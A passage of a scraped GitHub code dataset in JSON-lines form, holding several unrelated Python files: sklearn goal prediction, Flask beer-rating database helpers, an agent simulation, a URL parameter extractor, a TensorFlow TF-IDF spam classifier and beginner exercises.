data\ndata.to_csv(\"modified_data.csv\", index=False)\n# Read dataset\ndata_all = pd.read_csv(\"modified_data.csv\")\n\ndata_fr = data_all.dropna(axis=0, inplace=False)\ndata_nan = data_all[data.isnull().any(axis=1)]\ndata_nan.drop(['is_goal'], axis=1, inplace=True)\n# Split the variables\ny = data_fr['is_goal'].to_numpy()\nX = (data_fr.drop(['is_goal', 'shot_id_number'], axis=1,\n inplace=False)).iloc[:,:]\n\n# Split the Train Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train_scaled = sc.fit_transform(X_train)\nX_test_scaled = sc.transform(X_test)\n\ndef modelClassification(X_trainset, X_testset, y_trainset, y_testset,\n classifier, name):\n # Fitting the model to classifier\n classifier.fit(X_trainset, y_trainset)\n \n # Predicting the Results\n y_pred = classifier.predict(X_testset)\n\n# Making the training set\n from sklearn.metrics import confusion_matrix, accuracy_score, mean_absolute_error\n cm = confusion_matrix(y_testset, y_pred)\n print(cm)\n print(\"Accuracy of \"+name+\" is :\",accuracy_score(y_testset, y_pred))\n print(\"MAE of \"+name+\" is :\",mean_absolute_error(y_testset, y_pred))\n # for the actual dataset\n X_nan = (data_nan.drop(['shot_id_number'], axis=1,\n inplace=False)).iloc[:,:]\n \n y_nan_pred = classifier.predict(X_nan)\n result_df = pd.DataFrame({'shot_id_number':data_nan['shot_id_number'],\n 'is_goal':y_nan_pred},\n columns=['shot_id_number','is_goal'])\n result_df.to_csv(\"results/\"+name+\"_classifier_prediction_1.csv\", index=False)\n\n\n\n# Fitting Logistic Regression to the Training set\nfrom sklearn.linear_model import LogisticRegression\nclassifier = LogisticRegression(n_jobs=-1)\n\nmodelClassification(X_train_scaled, X_test_scaled, y_train, y_test, classifier,\n name=\"logistic_regression\")\n\n# Fitting KNN to the Training set\nfrom sklearn.neighbors import KNeighborsClassifier\nclassifier = KNeighborsClassifier(n_neighbors=20, n_jobs=-1)\n\nmodelClassification(X_train_scaled, X_test_scaled, y_train, y_test, classifier, name=\"knn\")\n\n# =============================================================================\n# # Fitting SVM to the Training set\n# from sklearn.svm import SVC\n# classifier=SVC(kernel='rbf',probability=True, class_weight='balanced')\n# \n# model_train(X_train_scaled, X_test_scaled, y_train, y_test, classifier, name=\"svm\")\n# \n# =============================================================================\n\n# Fitting Decision Tree Classification to the Training set\nfrom sklearn.tree import DecisionTreeClassifier\nclassifier = DecisionTreeClassifier(max_depth=8, criterion = 'entropy',min_samples_leaf=20)\n\nmodelClassification(X_train_scaled, X_test_scaled, y_train, y_test, classifier, name=\"decision_tree\")\n\n\n# Fitting Random Forest Classification to the Training set\nfrom sklearn.ensemble import RandomForestClassifier\nclassifier = RandomForestClassifier(n_estimators = 110, max_depth = 10, \n criterion = 'entropy',min_samples_leaf=25,\n n_jobs=-1)\nmodelClassification(X_train_scaled, X_test_scaled, y_train,\n y_test, classifier, name=\"random_forest\")\n\n\nprint(\"The model is ran and executed successfully.\")","repo_name":"saddhu1005/Is-It-A-Goal","sub_path":"submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"18751147693","text":"import datetime\nimport json\nimport math\nimport os\nimport secrets\nfrom os import path\nimport traceback\nfrom PIL import Image\n\nfrom flask import current_app as app\nimport csv\nfrom pydub import AudioSegment\nfrom pydub.utils import mediainfo\nimport pathlib\nfrom werkzeug import secure_filename\nfrom collections import defaultdict\nfrom flask import flash\nfrom sqlalchemy import func\nfrom flask_security import current_user\nfrom skal.models import (User, db, Beer, BeerRating, BeerComment, Beernight,\n BeernightRating, CommentLike, CommentReport,\n BeernightBeer, BeernightBeer, BeernightbeerComment, BeernightbeerRating,\n BeernightRating, BeernightInvitation)\n\n\ndef resolve_order(object, sort_by, order='desc'):\n ordering = getattr(object, sort_by)\n if callable(ordering):\n ordering = ordering()\n if str(order) == 'asc':\n return ordering.asc()\n else:\n return ordering.desc()\n\n\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(form_picture.filename)\n picture_fn = random_hex + f_ext\n picture_path = os.path.join(app.config['BEERS_IMAGE_DIR'], picture_fn)\n output_size = (612, 612)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n i.save(picture_path)\n return picture_fn\n\ndef make_beer(form, image):\n try:\n beer = Beer()\n form.populate_obj(beer)\n beer.book_score = beer.calculateBook\n db.session.add(beer)\n db.session.commit()\n if beer:\n picture_file = save_picture(image)\n if picture_file:\n if beer.image_path:\n if path.exists(os.path.join(app.config['BEERS_IMAGE_DIR'], beer.image_path)):\n os.remove(os.path.join(app.config['BEERS_IMAGE_DIR'], beer.image_path))\n beer.image_path = picture_file\n db.session.commit()\n return beer\n except Exception as e:\n print(e)\n return False\n\ndef delete_beer_rating_if_exists(beer_id, user_id):\n rating = BeerRating.query\\\n .filter(BeerRating.beer_id == beer_id) \\\n .filter(BeerRating.user_id == user_id).all()\n exists = False\n for r in rating:\n exists = True\n db.session.delete(r)\n db.session.commit()\n return exists\n\n\ndef add_beer_rating(user_id, beer, rating):\n try:\n delete_beer_rating_if_exists(beer.id, user_id)\n if(rating != 0): \n beer_rating = BeerRating(user_id, beer, rating)\n db.session.add(beer_rating)\n db.session.commit()\n return beer_rating\n return True\n except Exception as e:\n print(e)\n return False\n\ndef check_cat_input(cat):\n return cat in ['rating', 'taste', 'smell', 'feel', 'sight']\n\ndef add_beernight_beer_rating(user_id, beer, grade, category):\n if not check_cat_input(category):\n return False\n\n try:\n rating = BeernightbeerRating.query\\\n .filter(BeernightbeerRating.beer_id == beer.id) \\\n .filter(BeernightbeerRating.user_id == user_id).first()\n if rating:\n if(grade == 0):\n setattr(rating, category, None)\n else:\n setattr(rating, category, grade)\n \n else:\n rating = BeernightbeerRating(user_id, beer)\n setattr(rating, category, grade)\n db.session.add(rating)\n db.session.commit()\n return rating\n\n except Exception as e:\n print(e)\n return False\n\ndef add_beer_comment(user_id, beer, text, parent_id=None):\n try:\n if(text and beer): \n beer_comment = BeerComment(user_id, beer, text, parent_id)\n db.session.add(beer_comment)\n db.session.commit()\n return beer_comment\n return True\n except Exception as e:\n print(e)\n return False\n\ndef delete_favourite_if_exists(beer_id, user):\n beers = user.beers\n favs = []\n for b in beers:\n if b.id == beer_id:\n favs.append(b)\n if favs:\n for f in favs:\n user.beers.remove(f)\n db.session.commit()\n return True\n return False\n\n\ndef add_beer_favourite(user, beer, fav):\n user_id = user.id\n try:\n delete = delete_favourite_if_exists(beer.id, user)\n if not delete:\n user.beers.append(beer)\n db.session.commit()\n return True\n return False\n except Exception as e:\n print(e)\n return False\n\ndef delete_beernight_rating_if_exists(beernight_id, user_id):\n rating = BeernightRating.query\\\n .filter(BeernightRating.beernight_id == beernight_id) \\\n .filter(BeernightRating.user_id == user_id).all()\n exists = False\n for r in rating:\n exists = True\n db.session.delete(r)\n db.session.commit()\n return exists\n\ndef add_beernight_rating(user_id, beernight, rating):\n try:\n delete_beernight_rating_if_exists(beernight.id, user_id)\n if(rating != 0): \n beernight_rating = BeernightRating(user_id, beernight.id, rating)\n db.session.add(beernight_rating)\n db.session.commit()\n return beernight_rating\n return True\n except Exception as e:\n print(e)\n return False\n\ndef make_beernight(form, beer, user):\n try:\n beernight = Beernight()\n form.populate_obj(beernight)\n beernight.creator_id = user.id\n beernight.admins.append(user)\n beernight.members.append(user)\n if beer:\n beernightBeer = BeernightBeer(beer)\n db.session.add(beernightBeer)\n db.session.flush()\n beernight.beers.append(beernightBeer)\n db.session.add(beernight)\n db.session.commit()\n os.mkdir(os.path.join(user.user_beernights_path, str(beernight.id)))\n return beernight\n except Exception as e:\n print(e)\n return None\n\n\ndef save_beernight_beer_picture(form_picture, beer):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(form_picture.filename)\n picture_fn = random_hex + f_ext\n picture_path = os.path.join(beer.data_path, picture_fn)\n output_size = (612, 612)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n i.save(picture_path)\n return picture_fn\n\n\ndef make_beernightbeer(form, beernight_id, image):\n try:\n beernight = Beernight.query.get(beernight_id)\n beer = BeernightBeer()\n form.populate_obj(beer)\n beer.is_custom_made = True\n db.session.add(beer)\n db.session.flush()\n beernight.beers.append(beer)\n db.session.commit()\n if beer:\n if image:\n picture_file = save_beernight_beer_picture(image, beer)\n if picture_file:\n if beer.image_path:\n if path.exists(os.path.join(beer.data_path, beer.image_path)):\n os.remove(os.path.join(beer.data_path, beer.image_path))\n beer.image_path = picture_file\n db.session.commit()\n return beer\n except Exception as e:\n print(e)\n return False\n\ndef make_member_admin(beernight_id, member_id):\n try:\n beernight = Beernight.query.get(beernight_id)\n member = User.query.get(member_id)\n beernight.admins.append(member)\n db.session.commit()\n return beernight\n except Exception as e:\n print(e)\n return None\n\ndef remove_member_from_beernight(beernight_id, member_id):\n try:\n beernight = Beernight.query.get(beernight_id)\n member = User.query.get(member_id)\n beernight.members.remove(member)\n db.session.commit()\n return beernight\n except Exception as e:\n print(e)\n return None\n\ndef send_beernight_invitation_db(user, beernight_id):\n beernight = Beernight.query.get(beernight_id)\n invite = BeernightInvitation.query \\\n .filter(BeernightInvitation.beernight_id == beernight_id) \\\n .filter(BeernightInvitation.receiver_id == user.id).first()\n if invite or beernight.is_user_in_beernight(user.id):\n return {'error':'Notandi þegar með boð eða þegar í smökkuni'}\n try:\n invite = BeernightInvitation(user.id, current_user.id, beernight_id)\n db.session.add(invite)\n db.session.commit()\n return {'invite':invite}\n except Exception as e:\n print(e)\n return {'error':'Eitthvað fór úrskeiðis'}\n\ndef delete_beernight_invitation_db(beernight_invitation_id):\n try:\n invite = BeernightInvitation.query.get(beernight_invitation_id)\n if invite.beernight.is_user_admin(current_user.id) or current_user.id == invite.receiver_id:\n db.session.delete(invite)\n db.session.commit()\n return True\n return False\n except Exception as e:\n print(e)\n return None\n\ndef accept_beernight_invitation_db(beernight_invitation_id):\n try:\n invite = BeernightInvitation.query.get(beernight_invitation_id)\n if invite.receiver_id == current_user.id:\n beernight = Beernight.query.get(invite.beernight_id)\n beernight.members.append(current_user)\n delete_beernight_invitation_db(beernight_invitation_id)\n db.session.commit()\n return True\n return False\n except Exception as e:\n print(e)\n return None\n\ndef make_member_beernight_admin(beernight_id, member_id):\n try:\n beernight = Beernight.query.get(beernight_id)\n member = User.query.get(member_id)\n if not beernight.is_user_admin(member_id) and beernight.is_user_member(member_id):\n beernight.admins.append(member)\n db.session.commit()\n return True\n return False\n except Exception as e:\n print(e)\n return None\n\n\ndef copy_public_beernight(form, beernight_id):\n try:\n old_beernight = Beernight.query.get(beernight_id)\n if old_beernight.is_public or old_beernight.is_user_admin(current_user.id):\n user = User.query.get(current_user.id)\n beernight = Beernight()\n form.populate_obj(beernight)\n beernight.admins.append(user)\n beernight.members.append(user)\n beernight.creator_id = current_user.id\n beernight.category = old_beernight.category\n for b in old_beernight.beers:\n beernightBeer = BeernightBeer(b.orginal_beer)\n db.session.add(beernightBeer)\n db.session.flush()\n beernight.beers.append(beernightBeer)\n if not old_beernight.copy_count:\n old_beernight.copy_count = 1\n else:\n old_beernight.copy_count += 1\n db.session.add(beernight)\n db.session.commit()\n os.mkdir(os.path.join(current_user.user_beernights_path, str(beernight.id)))\n return beernight\n return False\n except Exception as e:\n print(e)\n return None\n\ndef delete_beer_from_beernight_db(beer_id):\n try:\n beer = BeernightBeer.query.get(beer_id)\n db.session.delete(beer)\n db.session.commit()\n return True\n except Exception as e:\n print(e)\n return None\n\ndef add_beer_to_beernight_db(beer_id, beernight_id):\n try:\n beernight = Beernight.query.get(beernight_id)\n beer = Beer.query.get(beer_id)\n beernightBeer = BeernightBeer(beer)\n db.session.add(beernightBeer)\n db.session.flush()\n beernight.beers.append(beernightBeer)\n db.session.commit()\n return beernight\n except Exception as e:\n print(e)\n return None\n\ndef report_comment_db(comment_id, user_id):\n try:\n report = CommentReport.query\\\n .filter(CommentReport.comment_id == comment_id) \\\n .filter(CommentReport.user_id == user_id).all()\n if not report:\n report = CommentReport(user_id, comment_id)\n db.session.add(report)\n db.session.commit()\n return True\n return report\n except Exception as e:\n print(e)\n return False\n\ndef like_dislike_comment_db(comment_id, user_id):\n try:\n like = CommentLike.query\\\n .filter(CommentLike.comment_id == comment_id) \\\n .filter(CommentLike.user_id == user_id).all()\n if not like:\n like = CommentLike(user_id, comment_id)\n db.session.add(like)\n db.session.commit()\n return 'like'\n else: \n for i in like:\n db.session.delete(i)\n db.session.commit()\n return 'dislike'\n except Exception as e:\n print(e)\n return False\n\ndef delete_user_db(user):\n beernight_ratings = user.get_beernight_ratings\n beer_ratings = user.get_beer_ratings\n beer_beernight_beer_ratings = user.get_beernight_beer_ratings\n beer_comments = user.get_beer_comments\n beernights = user.get_beernights\n cats = [beernights, beernight_ratings, beer_ratings, beer_beernight_beer_ratings, beer_comments]\n for i in cats:\n for j in i:\n db.session.delete(j)\n db.session.commit()\n db.session.delete(user)\n db.session.commit()","repo_name":"StefanGunnlaugur/Beer-flask","sub_path":"skal/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":13323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"73770606044","text":"from helpers import *\nimport numpy as np\n\nclass Agent:\n def __init__(self):\n self.carry = None\n\n def see(self, env):\n pass\n\n def action(self, env):\n if env.env[self.x][self.y].is_dirty:\n env.env[self.x][self.y].dirty = False\n env.dirty -= 1\n elif isinstance(env.env[self.x][self.y].obj, Corral) and self.carry:\n env.env[self.x][self.y].obj.kid = self.carry\n self.carry = None\n else:\n if self.looked is None:\n return\n\n step = 1 + bool(self.carry)\n\n while step:\n if str(self.looked) == \"k\":\n nx, ny = self.compute_next_move((self.looked.x, self.looked.y), env)\n env.move_agent(nx, ny)\n if str(env.env[self.x][self.y].obj) == \"k\":\n self.carry = env.env[self.x][self.y].obj\n env.env[self.x][self.y].obj = None\n env.remove_kid(self.carry)\n else:\n nx, ny = self.compute_next_move((self.looked.x, self.looked.y), env, obs=[\"O\", \"C\", \"k\"])\n env.move_agent(nx, ny)\n step -= 1\n\n def next(self, env):\n self.see(env)\n self.action(env)\n\n def compute_next_move(self, pos, env, obs=[\"O\", \"C\"]):\n x, y = pos\n dx = np.sign(x - self.x)\n dy = np.sign(y - self.y)\n \n if str(env.env[self.x + dx][self.y + dy]) in obs:\n if str(env.env[self.x + dx][self.y + dy]) == \"C\" and not env.env[self.x + dx][self.y + dy].obj.with_kid:\n pass\n else:\n try:\n return rnd_choice(env.map_adj((self.x, self.y)), pred=lambda z: env.env[z[0]][z[1]].obj == None)\n except:\n return self.x, self.y\n\n return self.x + dx, self.y + dy\n\n def __str__(self):\n return \"A\"\n\nclass Reactive(Agent):\n def __init__(self):\n super().__init__()\n self.looked = None\n\n def see(self, env):\n pos = (self.x, self.y)\n if not self.carry and len(env.kids):\n self.looked = near_obj(pos, env, [\"k\"])\n else:\n self.looked = near_obj(pos, env, [\"C\", \"X\"])\n\n @property\n def name(self):\n return \"Reactive\"\n\n def __str__(self):\n return \"R\" if not self.carry else \"r\"\n\nclass Proactive(Agent):\n def __init__(self):\n super().__init__()\n self.looked = None\n\n def see(self, env):\n pos = (self.x, self.y)\n dp = env.garbage_pc()\n if not self.carry and len(env.kids):\n self.looked = near_obj(pos, env, [\"k\"])\n elif self.carry:\n self.looked = near_obj(pos, env, [\"C\"])\n else:\n self.looked = near_obj(pos, env, [\"X\"])\n\n @property\n def name(self):\n return \"Proactive\"\n\n def __str__(self):\n return \"P\" if not self.carry else \"p\"\n\ndef near_obj(pos, env, search): \n queue = [pos]\n mark = [ [ False for _ in range(len(env.env[0]))] for _ in range(len(env.env)) ]\n obj = None\n while queue:\n x, y = queue.pop(0)\n if mark[x][y]:\n continue\n mark[x][y] = True\n if str(env.env[x][y]) in search:\n if str(env.env[x][y]) == \"C\" and env.env[x][y].obj.with_kid:\n pass \n else:\n obj = env.env[x][y]\n break\n for ax, ay in env.directions(x, y):\n if not mark[ax][ay]:\n queue.append((ax, ay))\n return obj","repo_name":"hros18/proyecto-3-simulacion","sub_path":"src/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"38780363091","text":"import re\n\nclass ExtratorUrl:\n def __init__(self, url):\n self.url = self.sanitiza_url(url)\n self.valida_url()\n\n def sanitiza_url(self,url):\n if type(url) == str:\n return url.strip()\n else:\n return \"\"\n \n def valida_url(self):\n padrao_url = re.compile(\"(http(s)?://)?(www.)?bytebank.com(.br)?/cambio\")\n valida = padrao_url.match(self.get_url_base())\n if not valida:\n raise ValueError(\"O endereço {} não corresponde a uma url valida para esta operação.\".format(self.get_url_base())) \n elif not self.url:\n raise ValueError(\"A Url está vazia...\") \n\n def get_url_base(self):\n indice_interrogacao = self.url.find('?')\n if indice_interrogacao > 0:\n url_base = self.url[0:indice_interrogacao] \n else:\n url_base = self.url\n return url_base\n\n def get_url_parametros(self):\n indice_interrogacao = self.url.find('?')\n url_paramentros = self.url[indice_interrogacao+1:]\n return url_paramentros\n\n def get_valor_parametro(self, parametro_busca):\n indice_parametro = self.get_url_parametros().find(parametro_busca)\n indice_valor = indice_parametro + len(parametro_busca) + 1\n indice_e_comercial = self.get_url_parametros().find('&', indice_valor)\n if indice_e_comercial == -1:\n valor = self.get_url_parametros()[indice_valor:]\n else:\n valor = self.get_url_parametros()[indice_valor:indice_e_comercial]\n return valor\n\n def __len__(self):\n return len(self.url)\n \n def __str__(self):\n return \"URL: \" + self.url + \"\\nURL base: \" + self.get_url_base() + \"\\nParêmetros: \" + self.get_url_parametros()\n \n def __eq__(self, other) :\n return self.url == other.url\n\nextrator_url = ExtratorUrl(\"https://bytebank.com/cambio?moedaDestino=dolar&quantidade=100&moedaOrigem=real\")\n#extrator_url = ExtratorUrl(\"\")\n\nprint(\"O tamanho da URl é de {} caracteres.\".format(len(extrator_url)))\nprint(extrator_url)\nparametro_quantidade = extrator_url.get_valor_parametro(\"quantidade\")\nparametro_moeda_origem = extrator_url.get_valor_parametro(\"moedaOrigem\")\nparametro_moeda_destino = extrator_url.get_valor_parametro(\"moedaDestino\")\n\ndolar = 5.25\n\nif parametro_moeda_origem == \"real\" and parametro_moeda_destino == \"dolar\":\n conversao = float(parametro_quantidade)/ dolar\n simbolo = \"USD\"\nelif parametro_moeda_origem == \"dolar\" and parametro_moeda_destino == \"real\":\n conversao = float(parametro_quantidade) * dolar\n simbolo = \"R$\"\n\nprint(parametro_quantidade)\nprint(parametro_moeda_origem)\nprint(parametro_moeda_destino)\nprint(\"O valor da converão é {} {}\".format(simbolo,round(conversao,2)))","repo_name":"LuisSousa-MB/Python-way","sub_path":"Alura/manipulando_strings/extrator_url.py","file_name":"extrator_url.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"38823798577","text":"#!/usr/bin/python2.7\n# -*- coding:utf-8 -*-\n\n# Author: NetworkRanger\n# Date: 2018/12/10 下午9:30\n\n# 7.3 用TensorFlow实现TF-IDF算法\n\n# 1. 导入必要的编程库。本例中会导入scikit-learn的TF-IDF处理模块处理文本数据集\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\nimport os\nimport string\nimport requests\nimport io\nimport nltk\nfrom zipfile import ZipFile\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n# 2. 创建一个计算图会话, 声明批量大小和词汇的最大长度\nsess = tf.Session()\nbatch_size = 200\nmax_features = 1000\n\n# 3. 加载文本数据集。可以从网站下载或者从上次保存的temp文件夹加载\nsave_file_name = os.path.join('temp', 'temp_spam_data.csv')\nif os.path.isfile(save_file_name):\n text_data = []\n with open(save_file_name, 'r') as temp_output_file:\n reader = csv.reader(temp_output_file)\n for row in reader:\n text_data.append(row)\nelse:\n zip_url = 'http://archive.ics.uci.edu/ml/machine-learning-databases/00228/smsspamcollection.zip'\n r = requests.get(zip_url)\n z = ZipFile(io.BytesIO(r.content))\n file = z.read('SMSSpamCollection')\n # Format Data\n text_data = file.decode()\n text_data = text_data.encode('ascii', errors='ignore')\n text_data = text_data.decode().split('\\n')\n text_data = [x.split('\\t') for x in text_data if len(x) >= 1]\n\n # And write to csv\n with open(save_file_name, 'w') as temp_output_file:\n writer = csv.writer(temp_output_file)\n writer.writerows(text_data)\n\ntexts = [x[1] for x in text_data]\ntarget = [x[0] for x in text_data]\n# Relabel 'spam' as 1, 'ham' as 0\ntarget = [1 if x == 'spam' else 0 for x in target]\n\n# 4. 声明词汇大小。本例中也会将所有字符转换成小写,剔除标点符号和数字\n# Lower case\ntexts = [x.lower() for x in texts]\n# Remove punctuation\ntexts = [''.join(c for c in x if c not in string.punctuation) for x in texts]\n# Remove numbers\ntexts = [''.join(c for c in x if c not in '0123456789') for x in texts]\n# Trim extra whitespace\ntexts = [' '.join(x.split()) for x in texts]\n\n# 5. 为了使用scikit-learn的TF—IDF处理函数,我们需要输入切分好的语句(即将句子切分为相关的单词)。nltk包可以提供非常棒的分词器来实现分词功能\ndef tokenizer(text):\n words = nltk.word_tokenize(text)\n return words\n# Create TF-IDF of texts\ntfidf = TfidfVectorizer(tokenizer=tokenizer, stop_words='english', max_features=max_features)\nsparse_tfidf_texts = tfidf.fit_transform(texts)\n\n# 6. 分割数据集为训练集和测试集\ntrain_indices = np.random.choice(sparse_tfidf_texts.shape[0], round(0.8*sparse_tfidf_texts.shape[0]), replace=False)\ntest_indices = np.array(list(set(range(sparse_tfidf_texts.shape[0])) - set(train_indices)))\ntexts_train = sparse_tfidf_texts[train_indices]\ntexts_test = sparse_tfidf_texts[test_indices]\ntarget_train = np.array([x for ix, x in enumerate(target) if ix in train_indices])\ntarget_test = np.array([x for ix, x in enumerate(target) if ix in test_indices])\n\n# 7. 声明逻辑回归模型的变量和数据集的占位符\nA = tf.Variable(tf.random_normal(shape=[max_features, 1]))\nb = tf.Variable(tf.random_normal(shape=[1,1]))\n# Initialize placeholders\nx_data = tf.placeholder(shape=[None, max_features], dtype=tf.float32)\ny_target = tf.placeholder(shape=[None, 1], dtype=tf.float32)\n\n# 8. 声明算法模型操作和损失函数。注意,逻辑回归算法的sigmoid部分是在损失函数中实现的\nmodel_output = tf.add(tf.matmul(x_data, A), b)\nloss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=model_output, logits=y_target))\n\n# 9. 为计算图增加预测和准确度函数(可以让我们看到模型训练中训练集和测试集的准确度)\nprediction = tf.round(tf.sigmoid(model_output))\npredictions_corrent = tf.cast(tf.equal(prediction, y_target), tf.float32)\naccuracy = tf.reduce_mean(predictions_corrent)\n\n# 10. 声明优化器,初始化计算图中的变量\nmy_opt = tf.train.GradientDescentOptimizer(0.0025)\ntrain_step = my_opt.minimize(loss)\n# Initialize Variables\ninit = tf.global_variables_initializer()\nsess.run(init)\n\n# 11. 遍历迭代训练模型10000次,记录测试集和训练集损失,以及每迭代100次的准确度,然后每迭代500次就打印状态信息\ntrain_loss = []\ntest_loss = []\ntrain_acc = []\ntest_acc = []\ni_data = []\nfor i in range(10000):\n rand_index = np.random.choice(texts_train.shape[0], size=batch_size)\n rand_x = texts_train[rand_index].todense()\n rand_y = np.transpose([target_train[rand_index]])\n sess.run(train_step, feed_dict={x_data: rand_x, y_target: rand_y})\n\n # Only record loss and accuracy every 100 generations\n if (i+1)%100 == 0:\n i_data.append(i+1)\n train_loss_temp = sess.run(loss, feed_dict={x_data: rand_x, y_target: rand_y})\n train_loss.append(train_loss_temp)\n\n test_loss_temp = sess.run(loss, feed_dict={x_data: texts_test.todense(), y_target: np.transpose([target_test])})\n test_loss.append(test_loss_temp)\n\n train_acc_temp = sess.run(accuracy, feed_dict={x_data: rand_x, y_target: rand_y})\n train_acc.append(train_acc_temp)\n\n test_acc_temp = sess.run(accuracy, feed_dict={x_data: texts_test.todense(), y_target: np.transpose([target_test])})\n test_acc.append(test_acc_temp)\n\n if (i+1)%500 == 0:\n acc_and_loss = [i+1, train_loss_temp, test_loss_temp, train_acc_temp, test_acc_temp]\n acc_and_loss = [np.round(x,2) for x in acc_and_loss]\n print('Generation # {}. Train Loss (Test Loss): {:.2f} ({:.2f}). Train Acc (Test Acc): {:.2f} ({:.2f})'.format(*acc_and_loss))\n\n# 12. 输出结果如下\n\"\"\"\nGeneration # 500. Train Loss (Test Loss): 0.66 (0.63). Train Acc (Test Acc): 0.21 (0.24)\nGeneration # 1000. Train Loss (Test Loss): 0.59 (0.61). Train Acc (Test Acc): 0.18 (0.22)\nGeneration # 9500. Train Loss (Test Loss): 0.14 (0.23). Train Acc (Test Acc): 0.17 (0.13)\nGeneration # 10000. Train Loss (Test Loss): 0.24 (0.20). Train Acc (Test Acc): 0.12 (0.13)\n\"\"\"\n\n# 13. 绘制训练集和测试的准确度的损失函数\n\n\n","repo_name":"NetworkRanger/tensorflow-ml-exercise","sub_path":"chapter07/demo_7.3.py","file_name":"demo_7.3.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"42917230696","text":"def sayHello(name):\n print(\"Hello\", name)\n return\n\nname = input(\"Enter your name\")\nsayHello(name)\n\n#Performing sum of numbers\n\ndef addNum(a, b):\n c = a +b\n return c, a, b\n\nprint(addNum(2, 3))\n\n# pass list as a parameter\n\nlist1 = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nlist2 = [2, 3, 4]\n\ndef addNumFromList(list1):\n for x in list1:\n print(x)\n\naddNumFromList(list2)\n\n# Definining lambda or anonymous function\n\nsquare = lambda x: x*x\nprint(square(5))\n\ndef squares(x):\n return x*x\n\nprint(squares(5))\n\na = input(\"ENter a string\")\nprint(len(a))\n\nprint()\n\n# Printing string in all uppercase letters\n\nprint(a.upper())\nprint(a.split(\" \"))\n\nb = input(\"ENter a group of words\")\n\nwords = b.split(\" \")\nprint(words)\nc=''\nfor x in range(len(words)):\n c += words[x]\n if x < len(words) - 1:\n c += '-'\n\n\nprint(c)\n\nname = input(\"Enter your name\")\nnames = name.split(' ')\nfinal = ''\nfor x in range(len(names)):\n final += names[x].capitalize()\n final += \" \"\n\nprint(final)\n","repo_name":"LakshBhambhani/De-Anza-Python","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"16115889136","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pylab as plt\n\ndfLoad=pd.read_csv('https://raw.githubusercontent.com/hanwoolJeong/lectureUniv/main/testData_LinearRegression.txt',sep=\"\\s+\")\nxxRaw=np.array(dfLoad.values[:,0])\nyyRaw=np.array(dfLoad.values[:,1])\nplt.plot(xxRaw,yyRaw,\"r.\")\n\nN=len(xxRaw)\nxx_bias=np.c_[np.ones([100,1]),xxRaw]\nyy=yyRaw.reshape(N,1)\n\nwOLS=np.linalg.inv(xx_bias.T.dot(xx_bias)).dot(xx_bias.T).dot(yy)\nx_sample=np.linspace(0,2,101)#0~2의 행렬 설정\nx_sample_bias=np.c_[np.ones([101,1]),x_sample]#1행에 성분이 1인 행 추가\ny_bias=wOLS.T.dot(x_sample_bias.T)#행렬끼리 곱하기 위해서 x를 transpose\nplt.plot(x_sample.reshape(1,101),y_bias,\"b.-\")\neta=0.1\nn_iteration=1000\nwGD=np.zeros([2,1])\nprint(wGD)\nfor iteration in range(n_iteration):\n gradients=-(2/N)*(xx_bias.T.dot(yy-xx_bias.dot(wGD)))\n wGD=wGD-eta*gradients\nprint(wGD)","repo_name":"seotaek/machine-learning","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"33582126331","text":"\"\"\"This module has a class inherited by more specific validators.\"\"\"\nimport logging\nfrom abc import ABC, abstractmethod\n\nfrom utils.structure import Structure\n\n\nclass Validator(ABC):\n \"\"\"Base class inherited by more specific validators.\"\"\"\n\n def __init__(self, validation_message: str):\n self.validation_message = validation_message\n\n @abstractmethod\n def validate(self) -> bool:\n \"\"\"Each class implements this method with a specific validation.\"\"\"\n\n def write_validation_message(self, message: str = \"\"):\n \"\"\"Writes validation message.\"\"\"\n if message != \"\":\n message = message.replace(Structure.repository_folder, \"\")\n logging.info(\"%s\", message)\n else:\n self.validation_message = self.validation_message.replace(\n Structure.repository_folder, \"\")\n logging.info(\"%s\", self.validation_message)\n logging.debug(\"\")\n\n @staticmethod\n def write_debug_message(message: str):\n \"\"\"Writes debug message if needded.\"\"\"\n logging.debug(\"%s\", message)\n","repo_name":"PlatformOfTrust/standards","sub_path":"tools/ontology-validator/validators/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"75057995483","text":"# def check_S(S):\n# try:\n# a = S[0]\n# for i in S:\n# if i != a:\n# return False\n# return True\n# except:\n# return True\n#\n# def remove_S(S):\n# a = S[0]\n# for i in range(1, len(S)):\n# if S[i] != a:\n# S = S[:i - 1] + S[i + 1:]\n# return S\n# else:\n# a = S[i]\n#\n# def solution(S):\n#\n# while not check_S(S):\n# S = remove_S(S)\n#\n# 